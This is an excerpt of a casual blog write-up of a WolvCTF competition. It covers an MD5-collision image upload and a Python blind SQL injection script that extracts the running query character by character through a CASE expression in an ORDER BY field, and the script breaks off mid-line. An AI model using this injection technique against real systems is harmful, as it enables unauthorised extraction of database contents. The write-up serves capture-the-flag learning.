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Hiển thị các bài đăng có nhãn jwt
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 WolvCTF and i did my best. Hello guys, our team got rank 48th when i decide to write this writeup. I had just solved 2 web. Have no time for Other up 2,3,4 challenges btw i will do it later. Web1: Bean Cafe We need upload 2 difference images but same the md5 hash I found this drive which contain 2  image :d thx someone whose i dont know the name lmao https://drive.google.com/drive/folders/1eCcMtQkHTreAJT6JmwxG10x1HbT6prY0 Uploaded it Web2: Order Up 1  This is my script. Yeah that's all import requests import json import string a = string.printable s = "" url = "https://dyn-svc-order-up-xec3il0vccu5tn6p0q2n-okntin33tq-ul.a.run.app/query" for i in range ( 1 , 100 ):     for j in a:         data = {             "col1" : "item_name" ,             "order" : f " (case when (ascii(substr(current_query(), { i } ,1))= { ord (j) } ) then item_name else category end)"             #(case when (ascii(substr(current_database